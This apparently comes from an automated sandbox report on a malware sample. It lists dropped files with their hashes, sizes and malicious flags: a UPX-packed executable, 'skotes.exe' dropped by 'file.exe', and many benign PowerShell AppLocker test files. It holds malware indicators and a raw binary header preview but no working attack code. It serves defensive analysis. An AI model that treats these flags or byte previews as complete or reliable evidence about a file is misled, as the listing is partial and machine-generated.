                                                                                                                                                                                                                                        SSDEEP:6144:UcNGPr86AeT4HbUO2GkYmuUuQG1a7kj04fuNPYn/VoR4:UcNGz86iHbUORk+D1a7kLWNwna4
                                                                                                                                                                                                                                        MD5:C697DC94BDF07A57D84C7C3AA96A2991
                                                                                                                                                                                                                                        SHA1:641106ACD3F51E6DB1D51AA2E4D4E79CF71DC1AB
                                                                                                                                                                                                                                        SHA-256:58605600FDAAFBC0052A4C1EB92F68005307554CF5AD04C226C320A1C14F789E
                                                                                                                                                                                                                                        SHA-512:4F735678B7E38C8E8B693593696F9483CF21F00AEA2A6027E908515AA047EC873578C5068354973786E9CFD0D25B7AB1DD6CBB1B97654F202CBB17E233247A61
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........$z.eJ).eJ).eJ)...).eJ)..K(.eJ)..O(.eJ)..N(.eJ)..I(.eJ)|.K(.eJ)..K(.eJ).eK).eJ)|.G(.eJ)|.J(.eJ)|..).eJ)|.H(.eJ)Rich.eJ)........................PE..d.....,d.........." .....P...........V... ................................................`..........................................{..X....y.......p..........H............{.......................................b..8...........................................UPX0....................................UPX1.....P... ...F..................@....rsrc........p.......J..............@..............................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..

                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0vk12uhe.bxg.psm1

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):60
                                                                                                                                                                                                                                        Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2nix0s4t.vzd.ps1

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):60
                                                                                                                                                                                                                                        Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2yk1e3hr.dft.psm1

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):60
                                                                                                                                                                                                                                        Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3g0p3oyg.bkz.ps1

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):60
                                                                                                                                                                                                                                        Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4fyecrah.afk.ps1

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):60
                                                                                                                                                                                                                                        Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_a4qxywez.vub.psm1

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):60
                                                                                                                                                                                                                                        Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_apqyz0ln.ita.psm1

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):60
                                                                                                                                                                                                                                        Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_bwuxf0k2.e1n.psm1

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):60
                                                                                                                                                                                                                                        Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_chqokezk.onk.psm1

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):60
                                                                                                                                                                                                                                        Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_d1gvxicz.jw5.psm1

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):60
                                                                                                                                                                                                                                        Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_glqtbiud.eqe.ps1

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):60
                                                                                                                                                                                                                                        Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hc3qbd0d.mi5.ps1

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):60
                                                                                                                                                                                                                                        Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hr2qcpcy.nsx.ps1

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):60
                                                                                                                                                                                                                                        Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_le15bqn3.z3m.ps1

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):60
                                                                                                                                                                                                                                        Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_lm0dgduh.rfb.ps1

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):60
                                                                                                                                                                                                                                        Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_s5mq1kx4.ui5.psm1

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):60
                                                                                                                                                                                                                                        Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_swfqul5m.34q.psm1

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):60
                                                                                                                                                                                                                                        Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wfkidy2x.l2y.ps1

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):60
                                                                                                                                                                                                                                        Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zagxjyxw.4tk.ps1

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):60
                                                                                                                                                                                                                                        Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zcfefve4.uzk.psm1

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):60
                                                                                                                                                                                                                                        Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\file.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):3037184
                                                                                                                                                                                                                                        Entropy (8bit):6.54792183955597
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:49152:30HhKY2JwV6AskokjOnIY/cy6oMjYnJpY2Q2AM6J6OK:3mAJwV6AsFkiIycy6odnJ1Q2AM6J6O
                                                                                                                                                                                                                                        MD5:CD7686B11754D77B8722880A1A3A9A43
                                                                                                                                                                                                                                        SHA1:EA1C00D2985812539452A31D8F75506573DAD692
                                                                                                                                                                                                                                        SHA-256:A3D6D7EEA1A9270E20BE65394C942207078DAAC5952A12A9404DD4C557FD2944
                                                                                                                                                                                                                                        SHA-512:64D095A52C5A9987CBDBE00C95CD96DB67D5BF9FAA9A53C1132EAB27BE7D0D8B7ADF209195DB8B925C6453ADA759165ECFC8C1A5AC4F3EA7D3427FEA2B643CAB
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
